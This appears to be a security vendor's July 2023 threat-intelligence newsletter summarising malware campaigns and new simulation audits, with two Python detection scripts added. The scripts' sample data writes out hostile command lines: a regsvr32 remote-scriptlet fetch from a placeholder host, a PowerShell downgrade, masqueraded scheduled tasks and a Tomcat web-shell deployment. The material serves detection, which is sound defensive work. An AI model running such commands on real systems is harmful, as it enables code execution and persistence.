
Threat Simulator: July 2023 Update


Our Application and Threat Intelligence Research Center has been busy in July, creating simulations of the latest cyber threats to help our customers and partners stay safe. Threat Simulator replicates these real-world threats, allowing you to safely test your controls to ensure that your security posture is prepared, armed with identifiable Indicators of Compromise (IOC).

This month, we have witnessed a range of activities, from North Korean threat actors targeting supply chains to the Cybercartel group attacking financial institutions in Latin America and Vietnamese attackers tricking Facebook business account users. Additionally, Belarusian groups have been targeting Ukrainian and Polish institutions with malicious macros.

Read on to learn how we can assist you in maintaining your safety, no matter where you are in the world.

New Threat Campaigns

Episode V: Cybercartel strikes back:

Metabase Q released a report about a campaign by the Cybercartel group, which targets financial institutions in Mexico and Chile to steal information for financial gain.

It starts with phishing websites where a pop-up window tricks the user into installing a fake safeguard tool. This downloads a zip file containing code that fetches additional files over the WebDAV protocol. These files contain obfuscated code that, after deobfuscation, downloads another two files.

The first is a set of files with different information-stealing capabilities. The second is a batch file that installs a browser extension allowing the files in the first set to run on the compromised machine for financial gain.

Unit42 published statistics regarding ransomware delivery methods, their malicious functionalities and the most popular ransomware families observed during attacks.

The vast majority of ransomware is still delivered by deceiving users while they browse, while email is the second most common delivery method.

Regarding ransomware families, Lazy, Virlock and REvil are the top three most prevalent variants.

Social media represents the main method of hosting malicious samples.

Infostealer Distributed via CHM Files:

AhnLab has published a report about CHM-based malware that impersonates various Korean financial institutions and tricks users into installing an infostealer.

The infection starts from a plain Windows executable. Once the process runs, it opens a Windows Help file (CHM) that is decompiled to drop and run a file containing a WScript script.

The WScript script adds a registry key which runs a PowerShell command that downloads and installs the infostealer. The infostealer is small in size and sends the collected data to the threat actor in a compressed file format.

Akira Ransomware Extends Reach to Linux Platform:

Cyble Research and Intelligence Labs have observed that a threat group known as Akira, specialized in ransomware attacks, has extended its malware to run on the Linux platform.

The group is responsible for attacks in various countries and industries, and its malware is capable of encrypting files and shared network drives.

In addition, it maintains a list of file extensions and only encrypts files with those extensions.

Regarding the encryption process, the ransomware uses a pre-determined public key embedded in its code, which is used together with block ciphers such as AES-CBC.

Decrypted: Akira Ransomware:

Avast researchers released a report regarding their file decryptor program working against Akira ransomware on Windows and Linux platforms.

Previous research reports from other vendors had only identified a single Linux-compatible binary containing the ransomware.

The Windows Akira variants are developed in C++, use popular libraries such as Boost, and can change their encryption algorithm based on the size of the targeted file.

Tomcat Under Attack: Exploring Mirai Malware and Beyond:

Aqua Nautilus published a report about attacks on their Tomcat server honeypots which exploit weak username and password configurations.

The threat actors look for misconfigurations in the Tomcat web application manager, against which they perform brute-force attacks to guess the passwords of users authorized to access Tomcat resources.

After gaining access, the threat actor deploys a WAR file containing a malicious web shell that enables remote code execution on the server. The threat actor then downloads another script that performs various actions, including downloading binary files matching the system architecture.

In the end, this malware is used to perform different kinds of attacks, such as cryptomining or DDoS attacks.
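The chain above (manager brute force, successful login, WAR deployment, first request to the new context) leaves a clear trail in the Tomcat access log. The following Python is an added example, not code from Aqua Nautilus or from Threat Simulator; it assumes the default Tomcat AccessLogValve pattern, a failure threshold of five, and a constructed sample log.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample (not a real capture): 203.0.113.7 brute-forces the manager,
# logs in, deploys a WAR under /shell and then requests it; 10.0.0.5 is an admin
# who mistypes the password once.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2023:09:58:10 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - admin [12/Jul/2023:09:58:21 +0000] "GET /manager/html HTTP/1.1" 200 19803
203.0.113.7 - - [12/Jul/2023:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Jul/2023:10:01:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Jul/2023:10:01:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Jul/2023:10:01:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Jul/2023:10:01:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [12/Jul/2023:10:01:05 +0000] "GET /manager/html HTTP/1.1" 200 19803
203.0.113.7 - tomcat [12/Jul/2023:10:01:09 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 48
203.0.113.7 - - [12/Jul/2023:10:01:15 +0000] "GET /shell/ HTTP/1.1" 200 310
"""


def parse(log_text):
    """Parse access log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            events.append(d)
    return events


def analyze(events, fail_threshold=5):
    """Return {ip: [findings]} for the manager brute-force -> WAR deploy chain."""
    failures = defaultdict(int)     # 401s against /manager per client IP
    deployed = defaultdict(list)    # context paths each IP deployed via the manager
    findings = defaultdict(list)

    def add(ip, finding):
        if finding not in findings[ip]:
            findings[ip].append(finding)

    for e in events:
        ip, path, method, status = e["ip"], e["path"], e["method"], e["status"]
        if path.startswith("/manager"):
            if status == 401:
                failures[ip] += 1
                if failures[ip] >= fail_threshold:
                    add(ip, "manager_brute_force")
            elif status == 200 and failures[ip] >= fail_threshold:
                # A success after many failures is the guessed credential paying off.
                add(ip, "manager_login_after_brute_force")
            if status == 200 and (
                (method == "PUT" and path.startswith("/manager/text/deploy"))
                or path.startswith("/manager/html/upload")
            ):
                # Text interface: PUT /manager/text/deploy?path=/ctx ; HTML interface: upload form.
                add(ip, "war_deployed")
                m = re.search(r"[?&]path=(/[^&]*)", path)
                if m:
                    deployed[ip].append(m.group(1))
        else:
            # First traffic to a context this IP itself deployed: likely the web shell being used.
            for ctx in deployed[ip]:
                if path == ctx or path.startswith(ctx + "/"):
                    add(ip, "deployed_context_accessed")
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in analyze(parse(SAMPLE_LOG)).items():
        print(ip, hits)
```

The findings are ordered as observed, so the full sequence for one IP is itself the signal; a lone 401 followed by a 200 never triggers anything.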

Into the tank with Nitrogen:

Sophos published its findings regarding the Nitrogen malware family, its infection chain and its malicious features.

Nitrogen’s infection chain shares similarities with the one attributed to BlackCat ransomware. Victims may be lured by malicious advertisements redirecting to fake websites from which they install trojanized versions of popular IT tools such as WinSCP and AnyDesk.

The trojanized applications come bundled with the Python runtime environment and a malicious Python package which installs the NitrogenStager.

Through various techniques such as DLL sideloading or DLL proxying, the Nitrogen malware family installs penetration testing tools such as Metasploit and Cobalt Strike, from which attackers can open remote sessions or execute remote code.

Decoy Dog is No Ordinary Pupy: Separating a Sly DNS Malware from the Pack:

Infoblox released a report regarding a sophisticated malware called Decoy Dog, beyond the reach of average threat actors, which communicates with its C2 server over DNS.

Decoy Dog variants have been found since May 2022, all of them built on top of the open-source tool Pupy.

Decoy Dog communicates with the C2 server, although the type of data sent is still a mystery, and allows attackers to execute remote Java code.

Threat Actor Targeting Developers via Trojanized MS Visual Studio:

Cyble released a report about an information stealer malware that is delivered through a malicious installer disguised as a genuine Microsoft Visual Studio installer.

This malware stores basic stolen data such as the username in a text file and then proceeds to collect cookies from the installed browsers. This data is also stored as text files.

In the end, the malware connects to a Telegram bot, sends all the stolen data, then deletes it locally.

Hibernating Qakbot: A Comprehensive Study and In-depth Campaign Analysis:

Zscaler ThreatLabz published multiple case studies in which attackers used a wide variety of file formats to deploy and execute Qakbot malware, specialized in banking credential theft.

The presented attack scenarios share the same traits: execution in multiple phases and use of numerous file formats, from popular and easily detected ones such as JavaScript, PowerShell and Windows Script Files to more obscure ones such as eXtensible HTML (XHTML), Excel add-in libraries (XLL) and XMLHTTP.

The complexity of the attacks is also reflected in the large number of Tactics, Techniques, and Procedures (TTPs), which reinforces the idea that Qakbot is a dangerous malware in continuous evolution.

Apple Crimeware | Massive Rust Infostealer Campaign Aiming for macOS Sonoma Ahead of Public Release:

SentinelOne discovered several blockchain games serving as distribution vectors for a Rust-based infostealer named “realst” targeting both Windows and macOS.

The victims were initially contacted by various individuals posing as community managers looking for game testers. If the victim accepts the offer, they are given an archive containing several Python scripts along with various file formats such as disk images, Electron apps or native application bundles containing both the game and the main infostealer.

The “realst” infostealer can gather browser password keychains, cryptowallet credentials and desktop screenshots while also finding out if the running environment is sandboxed or not.

PurpleFox Being Distributed via MS-SQL Servers:

AhnLab has published a report about PurpleFox malware, a loader which mainly installs coin miners and targets poorly managed MS-SQL servers.

A PowerShell script is executed by a corrupted file. It runs a command which downloads an MSI and also invokes scripts that allow the threat actor to install the malware as an admin user through privilege escalation.

In the end, it changes a registry key and reboots the system, activating the malware.

North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack:

Mandiant discovered that an earlier compromise of an access management service called JumpCloud enabled a North Korean group labeled UNC4899 to spread its backdoors to downstream clients.

The JumpCloud vulnerability allowed attackers to execute remote code on victim machines, running a malicious Ruby downloader which installed the first-stage backdoor FULLHOUSE.DOORED.

Utilizing this first-stage malware, other more complex backdoors such as STRATOFEAR and TIEDYE are downloaded, configured and executed.

Finally, the attacker can execute remote commands and communicate discreetly with the victim computer through a custom-made protocol.

Fabricated Microsoft Crypto Wallet Phishing Site Spreads Infostealer:

Cyble Research and Intelligence Labs has released an article about phishing operations posing as the beta version of a Microsoft Crypto Wallet.

Once a victim falls for this scam, an open-source infostealer written in Rust called Luca Stealer is executed. This program is capable of replacing crypto wallet addresses and IBANs stored in the clipboard with addresses controlled by the attackers.

In addition, the stealer can detect whether the victim environment is virtualized using information such as system temperature.

Finally, the gathered information is exfiltrated via the Telegram API.

Threat Group Assessment: Mallox Ransomware:

Unit42 has raised concerns regarding the increased number of ransomware attacks carried out by the Mallox threat group.

The attackers gain control over exposed MS-SQL servers through repeated credential-guessing attempts, a technique known as a brute-force attack. Afterwards, a PowerShell script downloads the Mallox ransomware.

Finally, it disables data recovery and backup, terminates antivirus programs, bypasses an anti-ransomware mechanism and encrypts files.

Kanti: A NIM-Based Ransomware Unleashed in the Wild:

Cyble has shared updates regarding Dark Power utilizing new programming languages, such as Nim, to build a new ransomware called Kanti.

It is initially delivered through phishing emails disguised as an archive. Once executed, it only encrypts files with certain extensions, chosen by the ransomware so that encrypting them does not disrupt the whole system.

From recent observations, it seems that the ransomware is targeting cryptocurrency users.

P2PInfect: The Rusty Peer-to-Peer Self-Replicating Worm:

Unit42 has discovered a worm written in Rust, called P2PInfect, targeting Redis instances in cloud environments by exploiting CVE-2022-0543.

The vulnerability consists of loading external modules and libraries into the Lua scripting runtime that ships with Redis.

Attackers have implemented a Rust program which exploits this weakness in order to enable the victim host to start communication with a peer-to-peer network from which it receives further commands.

FakeSG enters the ‘FakeUpdates’ arena to deliver NetSupport RAT:

Malwarebytes released an article regarding NetSupport RAT, malware that is disguised as a browser installer, first presented as an “update” to the existing browser.

The infection is based on a fake installer downloaded from a compromised website, which retrieves a script that runs and downloads the malware.

Finally, the malware collects data and sends it to a C2 server.

BYOS – Bundle Your Own Stealer:

Check Point Research published an article explaining how a .NET compilation feature can be used by attackers to deliver BundleBot discreetly and to hinder analysis by security researchers.

This feature allows developers to ship their applications bundled with the whole .NET runtime, resulting in easier configuration and no dependency installation.

BundleBot uses the same tactic and is initially downloaded through fake Facebook Ads.

Once executed, it steals Discord and Telegram tokens, browser cookies, credentials and credit cards, finally sending them as an archive to the C2 server.

FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware:

Symantec released a report regarding Syssphinx, a threat group which reworked its backdoor, Sardonic, to be more elusive in order to successfully deliver the Noberus ransomware.

The attacks linked to the backdoor start with a PowerShell script which gathers information about the victim system architecture and chooses the appropriate .NET injector.

The injector decrypts the malicious backdoor embedded into it and prepares its runtime.

The recently observed backdoor variant can run credential-stealing tools such as Impacket and communicate with the C2 server through custom network protocols.

Diplomats Beware: Cloaked Ursa Phishing With a Twist:

Unit42 released a report regarding attempts by Russia’s Foreign Intelligence Service to spread malware to foreign embassies in Kiev through a fake advertisement and semiformal government-to-government diplomatic communications.

The first event related to this campaign is a fake advertisement for a car formerly used by a Polish diplomat. The document presents a URL from which photographs of the car can be downloaded. Alongside the photographs, malware is also downloaded and executed, which tries to communicate with a C2 server using the Microsoft Graph or Dropbox API.

The second event is a fake humanitarian aid document addressed to the Turkish Ministry of Foreign Affairs shortly after an earthquake.

Reverse Engineering Walkthrough | Analyzing A Sample Of Arechclient2:

SentinelOne, along with independent researchers, analyzed a malware strain from the Arechclient2 family, capable of C2 communication, loading other malicious payloads and information stealing.

The attack starts with an archive that contains compiled scripts written in AutoIt, a Windows scripting language. These files are delivered along with the legitimate AutoIt runtime needed to execute them.

The script files finally load a heavily obfuscated malicious .NET payload which utilizes a technique known as “process hollowing” to hijack a genuine process in order to start C2 communication.

CustomerLoader: a new malware distributing a wide variety of payloads:

Sekoia’s Threat & Detection Research Team discovered a new Loader-as-a-Service named CustomerLoader, purchased by various threat actors to deploy and load their malicious payloads without being detected.

CustomerLoader is a .NET executable featuring data obfuscation and C2 communication. In addition, it can bypass Microsoft’s Antimalware Scan Interface (AMSI) by patching in a function that always reports the scanned content as benign.

Other malicious payloads are delivered using reflective code loading to execute the payload in memory.

The malware has been linked to three incidents in which phishing emails, compromised YouTube channels and a fake Slack website were used as distribution channels.

BlotchyQuasar: X-Force Hive0129 targeting financial institutions in LATAM with a custom banking trojan:

IBM Security X-Force discovered that a threat group (Hive0129) is targeting users in Latin America in order to steal internet banking credentials using a new malware called BlotchyQuasar.

The remote access trojan is built on top of the open-source malware QuasarRAT, but with numerous new functionalities such as antivirus evasion, obfuscated C2 communication and credential extraction.

The attack starts with phishing emails mimicking government agencies, carrying a malicious .NET loader attachment called RoboSki.

The stealer is later deployed along with various third-party tools for C2 communication.

Finally, BlotchyQuasar gains persistence, disables various antivirus options, collects keystrokes and steals browser information whenever a banking website is opened.

Malicious campaigns target government, military and civilian entities in Ukraine, Poland:

Cisco Talos provided details about a Belarusian threat actor labeled UNC1151 that has targeted Ukrainian and Polish institutions using Microsoft Office documents embedded with malicious macros.

These macros, implemented in VBA, download or deploy further malware associated with post-exploitation phases of the attack, such as PicassoLoader, njRAT and Cobalt Strike.

Having installed a wide variety of malicious tools, the actors have been able to exfiltrate sensitive data and communicate with the C2 server.

Cloudy With a Chance of Credentials | AWS-Targeting Cred Stealer Expands to Azure, GCP:

SentinelOne released a report regarding an expansion of the attack surface in cloud environments, with threat actors such as TeamTNT now targeting Google Cloud Platform besides Amazon Web Services.

The attacker gained credentials for both AWS and GCP from unpatched Jupyter Notebook endpoints. Using these credentials, they deploy various shell scripts for reconnaissance. From the information gathered, researchers observed a strong interest in exposed Docker containers.

Propagation is done through a Go-compiled binary embedded with a network scanning tool.

Trojanized Application Preying on TeamViewer Users:

Cyble published an article explaining how attackers exploit the trust in popular applications, such as TeamViewer, to deliver njRAT for information stealing.

The installer contains both a genuine TeamViewer instance and njRAT, an open-source remote access trojan.

Afterwards, the trojan gains persistence on the victim system and ensures that the computer is not infected multiple times by the same attack.

Finally, it logs keystrokes and collects system information about the current Windows installation, while communicating with the C2 server for remote command execution.

PoC Exploit: Fake Proof of Concept with Backdoor Malware:

Uptycs researchers have discovered a novel Linux backdoor disguised as a fake Proof-of-Concept exploit tutorial for CVE-2023-35829.

The code is built upon an older Proof-of-Concept for CVE-2022-34918, but with modified components which gain persistence on the victim computer and disguise themselves as a system-level process.

The backdoor is capable of escalating privileges and can download further malicious programs during the post-exploitation phase.

Criminals target businesses with malicious extension for Meta’s Ads Manager and accidentally leak stolen accounts:

Malwarebytes Labs has released a report regarding Vietnamese attackers tricking Facebook business account users into downloading malware, resulting in account hijacking.

The actors use popular verified accounts to advertise their application, which is claimed to be more efficient at managing advertising campaigns than the official Meta application.

Once downloaded, it installs a malicious browser extension which steals Facebook credentials and exfiltrates them through Google Analytics to bypass browser defensive mechanisms.

Six Malicious Python Packages in the PyPI Targeting Windows Users:

Unit42 discovered a W4SP imitator which uploaded malicious Python packages to PyPI with the purpose of stealing information.

An earlier campaign uncovered a complex operation which tried to disguise malicious code in genuine Python scripts. However, the current attacker’s Python packages lack evasion and masquerading techniques. Judging by the limited number of uploaded packages, their simplicity and the reuse of malicious components from other attackers, the current actor poses a lesser threat than the original W4SP.

Once credentials of Windows applications and crypto wallets are collected, the malware exfiltrates them to a Discord webhook.

The Spies Who Loved You: Infected USB Drives to Steal Secrets:

Mandiant published a report regarding cyber espionage operations involving infected USB flash drives.

The article analyzes two malware families which were increasingly encountered: SOGU and SNOWYDRIVE.

SOGU is a backdoor developed in C and has been observed packed together with a malicious loader called KORPLUG, which is responsible for starting the backdoor. These components are developed by a Chinese espionage group called TEMP.Hex and are capable of keylogging, exfiltrating file contents and remote command execution.

SNOWYDRIVE is also delivered through infected USB drives and is capable of file exfiltration, file uploads and remote command execution. The malware was used across Asia to target oil and gas companies and is developed by the UNC4698 threat actor.

Analysis of the Rekoobe Backdoor Being Used In Attacks Against Linux Systems in Korea:

AhnLab released a report regarding the Rekoobe backdoor targeting Linux servers located in Korea.

The malware is delivered as a binary executable and is based on the open-source tool TinySHell.

Once executed, it behaves and appears as a benign process and opens a reverse shell to a C2 server.

Observations show that Rekoobe is used by the Chinese threat group APT31.

Malicious Batch File (*.bat) Disguised as a Document Viewer Being Distributed (Kimsuky):

AhnLab released a report regarding a campaign, presumably run by the Kimsuky threat actor, in which the attack adapts its behavior based on the antivirus solution found on the targeted system.

The initial step consists of phishing emails containing Windows batch files. Once executed, Google Drive and Google Docs are accessed in order to execute other scripts uploaded there.

A unique feature of the attack is identifying the running antivirus process and choosing which malicious scripts are downloaded and executed in the next steps. At the moment, the attacker has implemented custom adaptive behavior against Kaspersky, Avast and AhnLab.

The TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region:

Zscaler ThreatLabz has uncovered a complex targeted campaign against businesses in Latin America, involving custom-built, multi-phase malware.

The initial phase starts with phishing emails carrying an archive containing a downloader program, responsible for downloading the files for the next phases of the attack.

Afterwards, Krita Loader is executed to decrypt and prepare the subsequent phases.

The third phase involves InjectorDLL, which injects itself into a benign process to avoid detection and checks whether the targeted system is a sandbox environment. If it is, it forcefully restarts the system.

The last two phases consist of privilege escalation attempts and information stealing using the TOITOIN Trojan.

The five-day job: A BlackByte ransomware intrusion case study:

Microsoft Incident Response has discovered an evolved ransomware attack exploiting unsecured Microsoft Exchange Servers in order to spread to all computers in the internal network or Active Directory environment.

The initial infection vector uses the ProxyShell vulnerabilities from 2021, which allow an attacker to execute remote commands on the targeted system.

The second phase downloads various legitimate tools such as AnyDesk, Cobalt Strike and NetScan for network reconnaissance and C2 communication. In addition, a custom-made backdoor is executed which gathers information about existing antivirus solutions.

The final target of the attack is to encrypt local and remote files residing in the internal network using ExByte, a tool written in Go attributed to BlackByte ransomware incidents.

Distribution of NetSupport Malware Using Email:

AhnLab discovered an attack involving delivery of the NetSupport remote access tool and its unlawful use to gain control over targeted systems.

The initial gateway is phishing emails containing a JavaScript file. Once executed, it decrypts PowerShell commands embedded in it, executes them and connects to the C2 server to download other malware.

Finally, it downloads the NetSupport tool to gain persistent control over the system.

Increased Truebot Activity Infects U.S. and Canada Based Networks:

CISA, along with the FBI and the Canadian Centre for Cyber Security, released a joint report regarding new Truebot malware variants delivered through phishing or a vulnerability in the Netwrix Auditor application (CVE-2022-31199).

Once executed, Truebot installs a remote access tool called FlawedGrace which establishes a connection with the C2 server. In addition, it can load various libraries (DLLs) for execution.

A second tool Truebot prepares on the victim computer is Cobalt Strike, a program used by security researchers to emulate known attacks.

The purpose of Truebot is to gather information about running processes and the computer’s network domain, and to deploy various third-party tools.

Kimsuky Threat Group Using Chrome Remote Desktop:

AhnLab Security Response Center published a report regarding a North Korean group called Kimsuky, observed to use Chrome Remote Desktop alongside the AppleSeed backdoor to steal information from affected systems.

The initial infection starts from spear phishing emails which contain documents enriched with malicious scripts that drop the AppleSeed backdoor.

This backdoor is capable of installing additional malware, keylogging, capturing screenshots, stealing files and C2 communication for further commands to be executed.

In addition, AppleSeed will interact with the Chrome web browser to force the infected machine to be controlled remotely.

BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection:

SentinelOne released a report regarding a new variant of the RustBucket macOS backdoor delivered by a North Korean threat group called BlueNoroff.

The initial attack vector is a fake PDF Viewer app which the victim is tricked into installing in order to view protected documents. This app is a compiled AppleScript used to drop the second stage.

The second stage consists of Swift and Objective-C binaries which download the main backdoor.

Finally, the Rust-based backdoor known as RustBucket gains persistence and has the ability to execute commands from the C2 server and gather disk information.

Email crypto phishing scams: stealing from hot and cold crypto wallets:

Securelist researchers have documented various cryptocurrency phishing scams used to compromise both hot and cold wallets using a cloned cryptocurrency exchange app called Ripple.

Since hot wallets are always connected to the Internet and are used frequently for small-scale transactions, they are not a major target for attackers. Malicious techniques against them have remained rather primitive, relying on spam emails.

Cold wallets, however, are storage media which are not always connected to the Internet and usually hold larger amounts of currency.

Attackers successfully cloned a popular exchange app, Ripple, which tricks victims into leaking their wallet credentials. Authentication is done using genuine third-party apps such as Ledger or Trezor.

Threat Alert: Anatomy of Silentbob’s Cloud Attack:

Aqua Nautilus researchers have found a new campaign by the TeamTNT threat actor, which targets misconfigured cloud environments through JupyterLab servers that support Docker.

The attackers use custom-made Docker images that contain scanning tools, used for reconnaissance in lateral movement and malware spread, and malicious applications such as crypto miners and the Tsunami backdoor.

All gathered information is sent back to a C2 server which instructs the malicious Docker containers which other servers can be compromised.

The attacker poses a great threat due to extensive technical knowledge, reflected in how they hide their infrastructure using ngrok hosting services and leave minimal traces using Anondns.

PhonyC2: Revealing a New Malicious Command & Control Framework by MuddyWater:

Deep Instinct Threat Lab released a report regarding a novel post-exploitation framework, called PhonyC2, created by an Iranian threat group called MuddyWater.

This framework, written in Python 3, can be considered an adaptation of previous frameworks such as POWERSTATS and MuddyC3, which were implemented in the deprecated Python 2.

It provides various features such as deobfuscating and executing payloads sent by the C2 server, gaining persistence on the target machine and downloading various third party tools.

Chinese Threat Actors Targeting Europe in SmugX Campaign:

Check Point Research has uncovered a cyber espionage campaign started by a new Chinese threat actor, which has targeted European embassies and Foreign Affairs ministries.

In order to evade detection as much as possible, the attacker uses a technique called HTML Smuggling, which consists of embedding JavaScript components into HTML documents that mimic user interaction events, such as clicks, in order to trick the browser into downloading malicious files.

The next phase of the attack executes the previously downloaded files, such as a PowerShell script which further downloads a remote access tool (RAT) called PlugX. This modular tool is capable of gathering keystrokes, screen captures and browser information and sending them to the C2 server.

New audits

Regsvr32 – ‘regsvr32.exe’: Execute remote SCT file with VBScript (Command Prompt) Technique T1218.010, Tactic TA0005

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a remote .SCT script via scrobj.dll, which creates a new file in the TEMP folder. The .SCT file contains VBScript code.

Regsvr32 – ‘regsvr32.exe’: Execute SCT file with VBScript (Command Prompt) Technique T1218.010, Tactic TA0005

Regsvr32.exe is a command-line program used to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Adversaries may abuse regsvr32.exe to execute a local .SCT script via scrobj.dll, which creates a new file in the TEMP folder. The .SCT file contains VBScript code.

Downgrade attack – powershell: Force powershell lower version execution (PowerShell) Technique T1562.010, Tactic TA0005

Adversaries may downgrade or use a version of system features that is outdated, vulnerable, and/or does not support updated security controls such as logging.

This audit downgrades the PowerShell version to the desired value; the chosen version must be lower than the one used by default on the system.

After downgrading, the audit executes a command specific to the default version, which is not available in the downgraded one, to verify that the audit executed successfully.

Masquerade Task or Service – ‘schtasks.exe’: Create a scheduled task masqueraded as ‘AdobeFlashSync’ (Command Prompt) Technique T1036.004, Tactic TA0005

Scheduled Task Service is a Microsoft Windows service allowing administrators to create, delete, query, change, run and end scheduled tasks on a local or remote machine.

This audit uses the ‘schtasks.exe’ command to create a scheduled task, unrelated to the AdobeFlashSync service but named AdobeFlashSync, to establish persistence.

Adobe Flash Sync is a legitimate service of Adobe Flash Player. It is designed to synchronize user settings and data across multiple devices.

Masquerade Task or Service – ‘schtasks.exe’: Create a scheduled task masqueraded as ‘Windows Update Agent1’ (Command Prompt) Technique T1036.004, Tactic TA0005

Scheduled Task Service is a Microsoft Windows service allowing administrators to create, delete, query, change, run and end scheduled tasks on a local or remote machine.

schtasks.exe is an included binary that interfaces with the Task Scheduler service to enable an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.

This audit uses the ‘schtasks.exe’ command to create a scheduled task, unrelated to the Windows Update service but named Windows Update Agent1, to establish persistence and to look like a legitimate service.

‘Windows Update Agent1’ is a name similar to ‘Windows Update Agent’, which is a Windows system service that manages the installation of updates and hotfixes on a computer running the Windows operating system.
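Each of the audits above leaves a distinctive process-creation record that a detection rule can match: regsvr32.exe loading scrobj.dll with an /i: scriptlet, powershell.exe asked for an explicit lower engine version, and schtasks.exe /create with a lookalike task name. The Python below is an added example, not Threat Simulator’s or MITRE’s code; it assumes Sysmon-style image and command-line fields, constructed sample events, the two task names from the audits as the lookalike list, and PowerShell 5 as the host default.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str
    command_line: str


# Names borrowed from the two masquerade audits; a new task named exactly like one
# of these, or like one of these plus a numeric suffix, is flagged.
LOOKALIKE_TASK_NAMES = {"adobeflashsync", "windows update agent"}
# Assumption: the monitored hosts ship Windows PowerShell 5.x, so any explicit
# request for a lower engine version is a downgrade (T1562.010).
DEFAULT_POWERSHELL_MAJOR = 5


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _task_name(cmd):
    m = re.search(r'/tn\s+(?:"([^"]+)"|(\S+))', cmd, re.IGNORECASE)
    return (m.group(1) or m.group(2)).strip() if m else None


def detect(event):
    """Return a list of (technique_id, detail) tuples for one event."""
    image = _basename(event.image)
    cmd = event.command_line
    low = cmd.lower()
    findings = []

    if image == "regsvr32.exe" and "scrobj.dll" in low:
        # T1218.010: scrobj.dll plus /i:<scriptlet> runs an .SCT instead of registering a DLL.
        m = re.search(r"/i:(\S+)", low)
        if m:
            remote = m.group(1).startswith(("http://", "https://", "ftp://"))
            origin = "remote" if remote else "local"
            findings.append(("T1218.010", f"regsvr32 loading {origin} scriptlet via scrobj.dll"))

    if image == "powershell.exe":
        # T1562.010: explicit -Version / -v with a major version below the host default.
        m = re.search(r"-v(?:ersion)?\s+(\d+)", low)
        if m and int(m.group(1)) < DEFAULT_POWERSHELL_MAJOR:
            findings.append(("T1562.010", f"PowerShell downgraded to engine version {m.group(1)}"))

    if image == "schtasks.exe" and re.search(r"/create\b", low):
        # T1036.004: new task named like a legitimate component (exact or with a numeric suffix).
        name = _task_name(cmd)
        if name:
            base = re.sub(r"\s*\d+$", "", name.lower())
            if name.lower() in LOOKALIKE_TASK_NAMES or base in LOOKALIKE_TASK_NAMES:
                findings.append(("T1036.004", f"scheduled task masquerading as '{name}'"))
    return findings


def scan(events):
    """Map each event's command line to the technique ids it triggered."""
    return {e.command_line: [t for t, _ in detect(e)] for e in events}


# Constructed sample events mirroring the audits (example.invalid is a reserved test name).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://example.invalid/audit.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:C:\Users\Public\audit.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -version 2 -Command "Get-Date"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -NoProfile -Command "Get-Date"'),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /sc onlogon /tn "Windows Update Agent1" /tr C:\Users\Public\wua.exe'),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /sc minute /mo 5 /tn AdobeFlashSync /tr C:\Users\Public\sync.exe'),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /query /tn "Windows Update Agent1"'),
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS).items():
        print(hits or ["-"], cmd)
```

Running the audits with this rule in place is a direct check that the corresponding telemetry reaches the SIEM; the benign events in the sample (a normal DLL registration, a default-version PowerShell call, a /query) show the rule stays quiet on routine administration.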